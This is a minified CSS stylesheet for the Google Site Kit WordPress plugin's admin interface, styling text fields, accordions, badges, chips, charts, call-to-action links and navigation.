.mdc-text-field{width:250px}.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled) .mdc-text-field__input{color:#161b18}.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled) .mdc-floating-label{color:#161b18}.googlesitekit-plugin .mdc-text-field .mdc-text-field__input{caret-color:#3c7251}.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__trailing{border-color:#3c7251}.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:#757575}.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing{border-color:#b8bdb9}.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing{border-color:#b8bdb9}.googlesitekit-plugin .mdc-text-field .mdc-notched-outline__leading{border-radius:8px 0 0 8px}[dir=rtl] .googlesitekit-plugin .mdc-text-field .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field .mdc-notched-outline__leading[dir=rtl]{border-radius:0 8px 8px 0}.googlesitekit-plugin .mdc-text-field .mdc-notched-outline__trailing{border-radius:0 8px 8px 0}[dir=rtl] .googlesitekit-plugin .mdc-text-field .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-text-field .mdc-notched-outline__trailing[dir=rtl]{border-radius:8px 0 0 8px}.googlesitekit-plugin .mdc-text-field .mdc-notched-outline__notch{padding-right:0;width:auto !important}@media(min-width: 600px){.googlesitekit-plugin .mdc-text-field{width:350px}}.googlesitekit-plugin .mdc-text-field--textarea{max-width:650px;width:100%}.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__trailing{border-color:#ac4220}.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:#ac4220}.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing{border-color:#ac4220}.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing{border-color:#ac4220}.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--disabled) .mdc-floating-label,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-floating-label{color:#ac4220}.googlesitekit-plugin .mdc-text-field--error:not(.mdc-text-field--focused) .mdc-floating-label--float-above,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea:not(.mdc-text-field--focused) .mdc-floating-label--float-above{color:#ac4220}.googlesitekit-plugin .mdc-text-field--error+.mdc-text-field-helper-line .mdc-text-field-helper-text,.googlesitekit-plugin .mdc-text-field--error.mdc-text-field--textarea+.mdc-text-field-helper-line .mdc-text-field-helper-text{color:#ac4220}.googlesitekit-plugin .mdc-text-field--textarea.mdc-text-field--focused{border-color:#446199}.googlesitekit-plugin .mdc-text-field--textarea .mdc-text-field__input{box-shadow:none;padding:8px 12px 12px}.googlesitekit-plugin .mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-text-field__input:focus{border-color:#446199}.googlesitekit-plugin .MuiCircularProgress-colorPrimary{color:#3c7251}.googlesitekit-plugin .MuiCircularProgress-colorSecondary{color:#108080}:root{--reach-combobox: 1}.googlesitekit-plugin{color:#161b18;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.43}.googlesitekit-plugin *,.googlesitekit-plugin *::before,.googlesitekit-plugin *::after{box-sizing:border-box}.googlesitekit-plugin svg{color:inherit}.googlesitekit-plugin svg:not(:root){overflow:hidden}.googlesitekit-plugin h1,.googlesitekit-plugin h2,.googlesitekit-plugin h3,.googlesitekit-plugin h4,.googlesitekit-plugin h5,.googlesitekit-plugin h6{color:#161b18}.googlesitekit-plugin .googlesitekit-subheading-1{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:700;line-height:1.14}.googlesitekit-plugin .googlesitekit-subheading-2{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33}.googlesitekit-plugin .googlesitekit-nodata{display:none}.googlesitekit-plugin legend,.googlesitekit-plugin p:not([class*=mdc-]){font-size:14px;letter-spacing:.25px}.googlesitekit-plugin a{color:#108080;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin a:hover{color:#108080;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-plugin a:focus{box-shadow:none;outline:1px dotted #000;outline-offset:3px}.googlesitekit-plugin button{background:none;border:none;border-radius:100px;color:#108080;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin button:hover{-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-plugin button:focus{outline:1px dotted #000;outline-offset:6px}.googlesitekit-plugin legend{line-height:1.5;margin:1em 0}.googlesitekit-plugin .screen-reader-only{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}@media(max-width: 599px){.googlesitekit-plugin .hidden-on-mobile{display:none}}.googlesitekit-hidden{display:none !important}.googlesitekit-activation .googlesitekit-activation__title{margin:10px 0 20px}.googlesitekit-noscript #googlesitekit-notice-activated{border-left-color:#fece72;margin:5px 15px 5px 0;padding:0}.googlesitekit-noscript #googlesitekit-notice-activated .googlesitekit-noscript{border:0;margin:0;padding:0}.googlesitekit-accordion{border:1px solid #ebeef0}.googlesitekit-accordion .googlesitekit-accordion__header,.googlesitekit-accordion .googlesitekit-accordion__content{padding:14px 20px}.googlesitekit-accordion .googlesitekit-accordion__header{cursor:pointer;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:700;line-height:1.14;padding-right:32px;position:relative;width:100%}.googlesitekit-accordion .googlesitekit-accordion__header:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-accordion .googlesitekit-accordion__header:focus{outline-offset:0}.googlesitekit-accordion .googlesitekit-accordion__header .googlesitekit-icon-wrapper{align-items:center;display:flex;justify-content:center;position:absolute;right:16px;top:50%;transform:translateY(-50%);width:20px}.googlesitekit-accordion .googlesitekit-accordion__header .googlesitekit-icon-wrapper svg{color:#5b5b61}.googlesitekit-accordion .googlesitekit-accordion__header.is-active{font-weight:700}.googlesitekit-accordion .googlesitekit-accordion__header.is-active .googlesitekit-icon-wrapper{transform:translateY(-50%) rotate(180deg)}.js .googlesitekit-accordion .googlesitekit-accordion__content{display:none}.js .googlesitekit-accordion .googlesitekit-accordion__content.is-active{display:block}.googlesitekit-accordion .googlesitekit-accordion__content p{margin-top:0}.googlesitekit-accordion.googlesitekit-accordion--disabled .googlesitekit-accordion__header{pointer-events:none}.googlesitekit-accordion.googlesitekit-accordion--disabled .googlesitekit-accordion__header .googlesitekit-icon-wrapper svg{color:rgba(3,14,7,.32)}.googlesitekit-accordion+.googlesitekit-accordion{border-top-width:0}.googlesitekit-plugin .googlesitekit-analytics-cta{--cta-analytics-gap: 16px;--cta-analytics-gap-narrow: calc(var(--cta-analytics-gap) / 2);background-color:#ebeef0;display:flex;flex-direction:column;gap:var(--cta-analytics-gap);padding:var(--cta-analytics-gap)}@media(min-width: 1440px){.googlesitekit-plugin .googlesitekit-analytics-cta{--cta-analytics-gap: 24px;flex-direction:row-reverse}}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta--description{color:#161b18;font-size:14px;letter-spacing:.25px;margin:0}.googlesitekit-plugin .googlesitekit-analytics-cta .mdc-button{margin-top:var(--cta-analytics-gap-narrow);width:100%}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-analytics-cta .mdc-button{width:auto}}@media(min-width: 1440px){.googlesitekit-plugin .googlesitekit-analytics-cta .mdc-button{margin-top:var(--cta-analytics-gap)}}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-cta--activate-analytics,.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graphs{display:flex;gap:var(--cta-analytics-gap)}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph{background-color:#fff;border-radius:4px;display:flex;flex:1;flex-direction:column;padding:var(--cta-analytics-gap-narrow)}#dashboard-widgets .googlesitekit-plugin .googlesitekit-analytics-cta h3.googlesitekit-analytics-cta__preview-graph--title,.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--title{color:#333935;font-size:12px;font-weight:500;letter-spacing:.2px;margin:0 0 auto;padding-bottom:var(--cta-analytics-gap-narrow)}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--icons{align-items:center;color:#cbd0d3;display:flex;gap:4px;padding-top:var(--cta-analytics-gap-narrow)}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--up-arrow{height:12px}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--bar{background-color:#cbd0d3;border-radius:5px;height:8px;width:24px}@media(min-width: 1440px){.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graphs,.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__details{flex:1}}.autocomplete__wrapper{flex:1 1 100%;margin:0 0 16px 0;position:relative}@media(min-width: 600px){.autocomplete__wrapper{flex:1;margin:0 16px 0 0}}@media(min-width: 960px){.autocomplete__wrapper{margin-right:24px}}.autocomplete__wrapper .autocomplete__input{border-color:#b8bdb9;border-radius:4px;color:#161b18;font-size:14px;font-weight:400;height:48px;letter-spacing:.25px;line-height:1.43;padding:12px 16px;position:relative;transition:border-color 150ms ease-in-out;width:100%;z-index:3}.autocomplete__wrapper .autocomplete__input:hover{border-color:#757575}.autocomplete__wrapper .autocomplete__input:focus{border-color:#446199;border-width:2px;box-shadow:none;padding:12px 15px}.autocomplete__input--default{padding:4px}.autocomplete__input--show-all-values{cursor:pointer;padding:4px 34px 4px 4px}.autocomplete__menu{background-color:#446199;border-radius:4px;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;left:1px;line-height:1.5rem;margin:0;padding:8px 0;top:calc(100% - 10px);width:100%}.autocomplete__menu--visible{display:block}.autocomplete__menu--hidden{display:none}.autocomplete__menu--inline{position:absolute;z-index:2}.autocomplete__option{color:#fff;font-weight:400;margin-bottom:0;overflow:hidden;padding:12px 16px;position:relative}.autocomplete__option--focused,.autocomplete__option:hover{background-color:rgba(22,27,24,.08)}.googlesitekit-badge{background-color:#ebeef0;border-radius:100px;color:#333935;display:inline-block;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33;padding:4px 8px;vertical-align:middle;white-space:nowrap}.googlesitekit-badge--has-left-spacing{margin-left:12px}.googlesitekit-badge--primary{background-color:#446199;color:#fff}.googlesitekit-badge--hidden{visibility:hidden}.googlesitekit-badge--beta{background-color:#6c726e;color:#fff}.googlesitekit-badge-with-tooltip{background-color:#ffe4b1;color:#684500;display:inline-flex;line-height:16px;padding:6px 10px}.googlesitekit-badge-with-tooltip .googlesitekit-info-tooltip{height:16px;margin-left:4px}.googlesitekit-badge-with-tooltip .googlesitekit-info-tooltip svg path{fill:#4e3300}.googlesitekit-plugin .mdc-button.googlesitekit-button-icon{min-height:auto;min-width:auto;padding:8px}@media(max-width: 599px){.googlesitekit-plugin .mdc-button.googlesitekit-button-icon--phone{min-height:auto;min-width:auto;padding:8px}}.googlesitekit-plugin .mdc-button.googlesitekit-button-icon--spinner__running svg circle{stroke:#fff}.googlesitekit-plugin .mdc-button.googlesitekit-button-icon--spinner__running.googlesitekit-button-icon--spinner__before .mdc-button__label{margin-inline-start:8px}.googlesitekit-plugin .mdc-button.googlesitekit-button-icon--spinner__running.googlesitekit-button-icon--spinner__after .mdc-button__label{margin-inline-end:8px}.googlesitekit-plugin .googlesitekit-change-arrow{--color-up: #46732b;--color-down: #ac4220}.googlesitekit-plugin .googlesitekit-change-arrow--inverted-color{--color-up: #ac4220;--color-down: #46732b}.googlesitekit-plugin .googlesitekit-change-arrow--up{color:var(--color-up)}.googlesitekit-plugin .googlesitekit-change-arrow--down{color:var(--color-up);transform:rotate(180deg)}.googlesitekit-plugin .googlesitekit-change-arrow--down path{fill:var(--color-down)}.googlesitekit-plugin .googlesitekit-change-badge{background-color:#d8ffc0;border-radius:100px;color:#1f4c04;font:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33;margin-top:6px;padding:4px 8px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-change-badge{margin-top:12px}}.googlesitekit-plugin .googlesitekit-change-badge.googlesitekit-change-badge--negative{background-color:#ffded3;color:#7a1e00}.googlesitekit-plugin .googlesitekit-change-badge.googlesitekit-change-badge--zero{background-color:#ebeef0;color:#333935}.googlesitekit-chart{position:relative}.googlesitekit-chart .googlesitekit-chart__source{font-size:12px;letter-spacing:.2px;margin-top:16px}.googlesitekit-chart .googlesitekit-chart__date-marker-line{border-left:1px dashed #131418;height:100%;left:0;margin-left:.5px;opacity:0;position:absolute;top:0;transition:opacity 180ms ease-in;width:0}.googlesitekit-chart .googlesitekit-chart__date-marker-tooltip{color:#108080;height:18px;left:0;opacity:0;position:absolute;top:0;transition:opacity 180ms ease-in;width:18px}.googlesitekit-chart--LineChart div.google-visualization-tooltip{height:fit-content !important;width:fit-content !important}.googlesitekit-chart--LineChart div.google-visualization-tooltip .google-visualization-tooltip-item-list{margin:.5em 0}.googlesitekit-chart--LineChart div.google-visualization-tooltip .google-visualization-tooltip-item{margin:0}.googlesitekit-chart--PieChart svg{overflow:visible !important}.googlesitekit-chart--PieChart svg>g>g{pointer-events:none}.googlesitekit-chart--PieChart svg>g:last-child>g:last-child{pointer-events:none}.googlesitekit-chart--PieChart div.google-visualization-tooltip{pointer-events:none;z-index:8}.googlesitekit-chart-loading__forced{height:100%;width:100%}.googlesitekit-chart-loading{align-items:center;display:flex;flex-wrap:wrap;height:100%;justify-items:center;width:100%}.googlesitekit-chart-loading .googlesitekit-chart-loading__wrapper{margin:0 auto;text-align:center;width:100%}.googlesitekit-plugin .googlesitekit-chip{background-color:transparent;border:1px solid #b8bdb9;border-radius:8px;color:#161b18;flex-direction:row-reverse;font-size:12px;justify-content:center;letter-spacing:.2px;line-height:1.33;margin:0;min-width:80px;padding:13px 12px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-chip{padding:3px 12px}}.googlesitekit-plugin .googlesitekit-chip .mdc-chip__checkmark{margin:0}.googlesitekit-plugin .googlesitekit-chip .mdc-chip__checkmark-svg{transition:none}.googlesitekit-plugin .googlesitekit-chip .mdc-chip__text{padding:0 12px}.googlesitekit-plugin .googlesitekit-chip.mdc-chip--selected{background-color:#b8e5ca;border-color:#b8e5ca;gap:6px}.googlesitekit-plugin .googlesitekit-chip.mdc-chip--selected .mdc-chip__checkmark-path{stroke:#161b18}.googlesitekit-plugin .googlesitekit-chip.mdc-chip--selected .mdc-chip__checkmark-svg{height:18px;width:18px}.googlesitekit-plugin .googlesitekit-chip.mdc-chip--selected .mdc-chip__text{padding:0}.googlesitekit-plugin .googlesitekit-chip.googlesitekit-chip--disabled{opacity:.5;pointer-events:none}.googlesitekit-plugin .googlesitekit-chip-multi-select{display:flex;flex-wrap:wrap;gap:12px}.googlesitekit-plugin .googlesitekit-chip-multi-select__item.googlesitekit-chip{background-color:#ebeef0;border:none;border-radius:100px;flex-direction:row;padding:6px 26px}.googlesitekit-plugin .googlesitekit-chip-multi-select__item.googlesitekit-chip .mdc-chip__checkmark{display:none}.googlesitekit-plugin .googlesitekit-chip-multi-select__item.googlesitekit-chip.mdc-chip--selected{background-color:#b8e5ca;border:none;gap:10px}.googlesitekit-plugin .googlesitekit-chip-multi-select__item.googlesitekit-chip.mdc-chip--selected .mdc-chip__checkmark{display:block}.googlesitekit-plugin .googlesitekit-chip-multi-select__item.googlesitekit-chip.mdc-chip--selected .mdc-chip__checkmark,.googlesitekit-plugin .googlesitekit-chip-multi-select__item.googlesitekit-chip.mdc-chip--selected .mdc-chip__checkmark svg{height:12px;width:12px}.googlesitekit-plugin .googlesitekit-chip-multi-select__item.googlesitekit-chip .mdc-chip__text{padding:0 11px;text-align:center;text-wrap:inherit}.googlesitekit-plugin .googlesitekit-chip-multi-select__item.googlesitekit-chip.mdc-chip--selected .mdc-chip__text{padding:0}.googlesitekit-plugin .googlesitekit-cta,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{background-color:#ebeef0;border-radius:16px;font-size:14px;grid-column:span 3;grid-row:span 3;height:100%;letter-spacing:.25px;line-height:1.43;padding:16px;width:100%}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-cta,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{padding:24px}}.googlesitekit-wp-dashboard .googlesitekit-plugin .googlesitekit-cta--error,.googlesitekit-wp-dashboard #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta--error{background-color:#fff}.googlesitekit-adminbar-modules .googlesitekit-plugin .googlesitekit-cta,.googlesitekit-adminbar-modules #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{padding:16px}.googlesitekit-wp-dashboard .googlesitekit-plugin .googlesitekit-cta,.googlesitekit-wp-dashboard #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{background-color:#ebeef0;box-sizing:border-box;height:auto;margin-top:12px;padding:12px}.googlesitekit-wp-dashboard .googlesitekit-wp-dashboard-stats__cta .googlesitekit-plugin .googlesitekit-cta,.googlesitekit-wp-dashboard .googlesitekit-wp-dashboard-stats__cta #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{margin-top:0}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__title,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__title{color:#161b18;font-weight:500;margin:0 0 5px}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar-modules .googlesitekit-cta__title,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar-modules .googlesitekit-cta__title{font-weight:700;letter-spacing:.5px}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description{color:#161b18;margin:0 0 20px}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description p:first-child,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description p:first-child{margin-top:0}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error{background-color:#ffded3}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error a,.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__title,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error a,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__title{color:#7a1e00}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__description,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__description{color:#7a1e00;word-break:break-word}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .mdc-button:not(:disabled),#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .mdc-button:not(:disabled){background-color:#ac4220;color:#fff}.googlesitekit-plugin .googlesitekit-cta *:last-child,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta *:last-child{margin-bottom:0}.googlesitekit-wp-dashboard .googlesitekit-cta--error{margin-top:12px}.googlesitekit-cta-link{align-items:center;cursor:pointer;display:inline-flex;font-family:inherit;font-size:inherit;font-weight:inherit;padding:0;text-align:left;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-cta-link svg{fill:currentColor}.googlesitekit-cta-link:hover svg{fill:currentColor}.googlesitekit-page .googlesitekit-cta-link{color:#108080}.googlesitekit-page .googlesitekit-cta-link:hover{color:#108080;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-cta-link.googlesitekit-cta-link--secondary{color:#108080}.googlesitekit-cta-link.googlesitekit-cta-link--secondary svg{fill:currentColor}.googlesitekit-cta-link.googlesitekit-cta-link--secondary:hover{color:#108080}.googlesitekit-cta-link.googlesitekit-cta-link--secondary:hover svg{fill:currentColor}.googlesitekit-cta-link.googlesitekit-cta-link--caps{text-transform:uppercase}.googlesitekit-cta-link.googlesitekit-cta-link--danger{color:#ac4220}.googlesitekit-cta-link.googlesitekit-cta-link--small{font-size:12px;letter-spacing:.2px}.googlesitekit-cta-link.googlesitekit-cta-link--standalone{display:flex}.googlesitekit-cta-link.googlesitekit-cta-link--inverse{color:#fff}.googlesitekit-cta-link.googlesitekit-cta-link--inverse:hover{color:#fff}.googlesitekit-cta-link.googlesitekit-cta-link--disabled{color:#b8bdb9;cursor:default}.googlesitekit-cta-link.googlesitekit-cta-link--danger:hover{color:#ac4220}.googlesitekit-cta-link.googlesitekit-cta-link--disabled:hover{color:#b8bdb9;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-cta-link.googlesitekit-cta-link--no-flex{display:inline}button.googlesitekit-cta-link{color:#3c7251}button.googlesitekit-cta-link svg{fill:currentColor}button.googlesitekit-cta-link:hover{color:#2e5f41}button.googlesitekit-cta-link:hover svg{fill:currentColor}button.googlesitekit-cta-link--link-button{padding:2px 10px}button.googlesitekit-cta-link--link-button:focus{background-color:rgba(60,114,81,.08);outline:none}button.googlesitekit-cta-link--link-button.googlesitekit-cta-link--secondary:focus{background-color:rgba(16,128,128,.08)}.googlesitekit-plugin .googlesitekit-navigation{background-color:#fff;border-bottom:1px solid #ebeef0;justify-content:center;left:0;padding:12px 0;position:sticky;right:0;top:68px;z-index:10}.googlesitekit-plugin .googlesitekit-navigation::before{content:"";display:block;height:3px;left:0;opacity:1;position:absolute;top:-3px;transition:opacity 0s;width:100%}body.googlesitekit-showing-feature-tour .googlesitekit-plugin .googlesitekit-navigation,body.googlesitekit-showing-tooltip .googlesitekit-plugin .googlesitekit-navigation{position:static}@media(min-width: 601px){body.admin-bar .googlesitekit-plugin .googlesitekit-navigation{top:114px}}@media(min-width: 783px){body.admin-bar .googlesitekit-plugin .googlesitekit-navigation{top:100px}}@media(min-width: 961px){body.admin-bar .googlesitekit-plugin .googlesitekit-navigation{top:116px}}.googlesitekit-plugin .googlesitekit-navigation .mdc-chip{background-color:#fff;border:1px solid #ebeef0;border-radius:100px;color:#161b18;font-size:14px;letter-spacing:.2px;line-height:1;padding:11px 14px 11px 19px}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-navigation .mdc-chip{padding:5px 10px 5px 12px}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-navigation .mdc-chip{margin:4px 12px}}.googlesitekit-plugin .googlesitekit-navigation .mdc-chip::before{background:none}.googlesitekit-plugin .googlesitekit-navigation .mdc-chip:hover::before{background-color:rgba(22,27,24,.08);opacity:1;transition:none}.googlesitekit-plugin .googlesitekit-navigation .mdc-chip .mdc-chip__icon{border-radius:0;height:auto;margin-right:6px;width:auto}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-navigation .mdc-chip .mdc-chip__icon{display:none}}.googlesitekit-plugin .googlesitekit-navigation .mdc-chip--selected{color:#3c7251}.googlesitekit-plugin .googlesitekit-navigation--is-sticky{border-bottom:1px solid #ebeef0}.googlesitekit-plugin .googlesitekit-navigation--is-sticky+.googlesitekit-entity-header{border-bottom:1px solid #ebeef0}.googlesitekit-plugin .googlesitekit-navigation--entityDashboard{border-bottom:1px solid #ebeef0;border-radius:0}.googlesitekit-plugin--has-scrolled .googlesitekit-plugin 